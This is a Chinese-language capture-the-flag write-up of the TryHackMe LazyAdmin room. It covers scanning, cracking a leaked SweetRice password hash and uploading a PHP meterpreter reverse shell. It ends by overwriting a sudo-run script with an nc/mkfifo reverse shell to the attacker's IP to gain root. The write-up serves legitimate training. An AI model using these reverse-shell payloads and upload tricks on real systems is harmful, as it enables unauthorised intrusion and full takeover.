THM-LazyAdmin | Ya1orin🍭

THM-LazyAdmin

发表于 2024-10-01|更新于2024-11-13|TryHackMe

|字数总计:938|阅读时长:4分钟|阅读量:

靶机ip：10.10.36.50

信息收集

nmap扫描

nmap -sS -sV -sC 10.10.36.50 -o out.txt

# Nmap 7.94SVN scan initiated Tue Oct  1 13:28:01 2024 as: nmap -sS -sV -sC -o out.txt 10.10.36.50
Nmap scan report for 10.10.36.50
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct  1 13:28:39 2024 -- 1 IP address (1 host up) scanned in 38.00 seconds

发现只有 22端口和80端口开放

80端口

80端口是一个apache初始页面什么也没有，扫描一下目录

gobuster dir -u http://10.10.36.50/ -w /usr/share/wordlists/dirb/common.txt

发现/content路由，访问一下

发现是SweetRice站点，继续扫描目录

gobuster dir -u http://10.10.36.50/content -w /usr/share/wordlists/dirb/common.txt

这回发现了一些有意思的内容

在/_themes下，发现一些查看不了源码的php文件，并没有什么用

在/as路由下找到登录口

/attachment路由下并没有什么信息

这里直接看/inc路由

很明显看到数据库备份文件夹，将里面的sql文件下载到本地查看

发现该cms版本为1.5.1，且密码也有，用户名是manager，尝试hashcat破解密码，将密码保存为passwd

hashcat -a 0 -m 0 passwd /usr/share/wordlists/rockyou.txt

发现成功破解密码，密码是Password123

尝试通过as路由登录manager账户

登录成功，同时可以确认该cms版本号为1.5.1

MSF获取权限

启动msf，search一下该cms，看看能否有可以直接利用的漏洞

很可惜，没有可以直接用的，但是searchsploit发现了可以利用的，其中Backup Disclosure我们之前手动实现了，并登陆到了后台

但是我们可以利用其他的，比如Arbitrary File Upload，我们可以通过这个漏洞上传shell，这里使用msf进行反弹shell

先使用msf创建一个监听

1 2	use exploit/multi/handler # 使用 exploit/multi/handler 模块 set payload php/meterpreter/reverse_tcp # 设置php的攻击负载payload

将需要的选项填好

设置好监听器后，生成php反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=10.11.101.220 lport=4444 R>shell.php

在http://10.10.36.50/content/as/?type=media_center处，将文件传上去

传.php文件时，发现并没有反应，将文件后缀改为.phtml，成功上传

在msf中run执行，在点击当前页面的shell.phtml文件，此时发现shell成功弹回来了

换成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在/home/itguy下找到user.txt

权限提升

输入sudo -l查看是否有可以利用了命令

只发现了一条

(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

查看一下backup.pl文件

发现只是调用/etc/copy.sh文件

通过仔细查看两个文件后发现，我们不能修改backup.pl但是可以改/etc/copy.sh文件的内容

查看/etc/copy.sh文件后发现，内容是反弹shell的命令，将其修改成自己的ip和port

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.101.220 4445 >/tmp/f" >/etc/copy.sh

另起一个监听

在msf终端shell里执行命令

sudo /usr/bin/perl /home/itguy/backup.pl

可以看到在新的shell里获得了root权限

最后在/root下找到root.txt

相关推荐

THM-GamingServer

THM-Daily Bugle

数据库加载中